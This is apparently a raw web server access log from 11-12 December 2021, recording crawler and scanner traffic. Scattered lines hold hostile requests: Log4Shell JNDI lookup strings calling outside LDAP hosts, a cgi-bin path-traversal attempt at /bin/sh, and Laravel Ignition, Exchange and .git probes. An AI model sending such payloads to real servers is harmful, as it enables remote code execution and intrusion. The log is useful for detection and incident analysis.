207.46.13.127 - - [11/Dec/2021:01:09:14 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 34.213.129.24 - - [11/Dec/2021:01:45:09 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 50.112.234.243 - - [11/Dec/2021:01:45:31 +0100] "GET /favicon.ico HTTP/1.1" 301 302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 45.155.205.233 - - [11/Dec/2021:01:46:34 +0100] "GET /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.33.65.249 - - [11/Dec/2021:01:51:43 +0100] "GET / HTTP/1.0" 301 388 "-" "-" 45.33.65.249 - - [11/Dec/2021:01:51:43 +0100] "SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1" 400 925 "-" "-" 45.33.65.249 - - [11/Dec/2021:01:51:43 +0100] "GET /1jQp HTTP/1.1" 301 387 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:43 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:43 +0100] "GET / HTTP/1.0" 301 388 "-" "-" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 301 424 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 301 400 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 301 398 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /index.aspx HTTP/1.1" 301 393 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 301 401 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /Portal0000.htm HTTP/1.1" 301 397 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "POST /sdk HTTP/1.1" 301 386 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /nmaplowercheck1639183903 HTTP/1.1" 301 407 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /favicon.ico HTTP/1.1" 301 394 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /.git/HEAD HTTP/1.1" 301 392 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:44 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 301 424 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:45 +0100] "GET /main.jhtml HTTP/1.1" 301 393 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:45 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 301 404 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:45 +0100] "HEAD / HTTP/1.1" 301 - "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:45 +0100] "GET /__Additional HTTP/1.1" 301 395 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:46 +0100] "GET /server-status HTTP/1.1" 301 396 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:46 +0100] "GET /pools HTTP/1.1" 301 388 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:47 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.54.0" 45.33.65.249 - - [11/Dec/2021:01:51:54 +0100] "GET / HTTP/1.0" 301 388 "-" "-" 45.33.65.249 - - [11/Dec/2021:01:51:55 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 107.189.31.26 - - [11/Dec/2021:02:36:19 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 185.107.47.171 - - [11/Dec/2021:02:36:28 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 45.155.205.233 - - [11/Dec/2021:02:41:55 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 34.77.162.13 - - [11/Dec/2021:03:14:57 +0100] "GET / HTTP/1.1" 301 377 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 34.96.130.10 - - [11/Dec/2021:03:22:39 +0100] "GET / HTTP/1.1" 301 393 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 34.86.35.18 - - [11/Dec/2021:03:32:31 +0100] "GET / HTTP/1.1" 301 391 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 192.241.213.252 - - [11/Dec/2021:03:38:17 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.199.143 - - [11/Dec/2021:04:11:16 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 45.155.205.233 - - [11/Dec/2021:04:22:50 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 20.74.166.164 - - [11/Dec/2021:04:26:26 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" 131.220.6.152 - - [11/Dec/2021:04:52:06 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 128.14.134.134 - - [11/Dec/2021:05:16:44 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 167.71.13.196 - - [11/Dec/2021:05:55:15 +0100] "GET /$%7Bjndi:ldaps://47ab8b9f.probe001.log4j.leakix.net:1266/b%7D?${jndi:ldaps://47ab8b9f.probe001.log4j.leakix.net:1266/b}=${jndi:ldaps://47ab8b9f.probe001.log4j.leakix.net:1266/b} HTTP/1.1" 301 357 "-" "${jndi:ldaps://47ab8b9f.probe001.log4j.leakix.net:1266/b}" 185.180.143.138 - - [11/Dec/2021:07:38:53 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 141.98.83.139 - - [11/Dec/2021:07:56:01 +0100] "GET /owa/auth.owa HTTP/1.1" 301 395 "-" "Spider" 207.46.13.127 - - [11/Dec/2021:10:46:03 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 192.241.213.87 - - [11/Dec/2021:12:19:50 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 109.248.6.239 - - [11/Dec/2021:13:27:27 +0100] "GET /api/blog/5e09fe7d-84f5-4630-90c6-c0a838627227 HTTP/1.0" 301 433 "-" "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" 193.118.53.210 - - [11/Dec/2021:15:27:55 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 192.241.212.113 - - [11/Dec/2021:17:46:49 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 138.197.106.234 - - [11/Dec/2021:18:31:06 +0100] "GET / HTTP/1.1" 301 301 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}" 138.197.106.234 - - [11/Dec/2021:20:08:45 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 301 353 "-" "Kryptos Logic Telltale" 66.240.192.138 - - [11/Dec/2021:20:56:59 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" 66.240.192.138 - - [11/Dec/2021:20:57:10 +0100] "" 400 379 "-" "-" 66.240.192.138 - - [11/Dec/2021:20:57:11 +0100] "" 400 379 "-" "-" 66.240.192.138 - - [11/Dec/2021:20:57:12 +0100] "" 400 379 "-" "-" 66.240.192.138 - - [11/Dec/2021:20:57:15 +0100] "quit" 400 379 "-" "-" 66.240.192.138 - - [11/Dec/2021:20:57:20 +0100] "GET /robots.txt HTTP/1.1" 301 393 "-" "-" 66.240.192.138 - - [11/Dec/2021:20:57:21 +0100] "GET /sitemap.xml HTTP/1.1" 301 394 "-" "-" 66.240.192.138 - - [11/Dec/2021:20:57:22 +0100] "GET /.well-known/security.txt HTTP/1.1" 301 407 "-" "-" 66.240.192.138 - - [11/Dec/2021:20:57:24 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0" 66.240.192.138 - - [11/Dec/2021:20:57:28 +0100] "" 400 379 "-" "-" 192.241.211.160 - - [11/Dec/2021:22:06:56 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 198.199.95.200 - - [11/Dec/2021:22:08:37 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.213.113 - - [11/Dec/2021:22:10:17 +0100] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 34.221.247.28 - - [11/Dec/2021:22:12:27 +0100] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.187.137.61 - - [11/Dec/2021:22:13:19 +0100] "GET /favicon.ico HTTP/1.1" 301 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.187.137.61 - - [11/Dec/2021:22:13:25 +0100] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 207.46.13.237 - - [11/Dec/2021:23:19:20 +0100] "GET /robots.txt HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.237 - - [11/Dec/2021:23:19:22 +0100] "GET /robots.txt HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.127 - - [11/Dec/2021:23:19:25 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 18.237.52.164 - - [12/Dec/2021:00:28:17 +0100] "GET / HTTP/1.1" 301 306 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 35.88.135.159 - - [12/Dec/2021:00:29:03 +0100] "GET /favicon.ico HTTP/1.1" 301 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 35.88.135.159 - - [12/Dec/2021:00:29:05 +0100] "GET / HTTP/1.1" 301 306 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"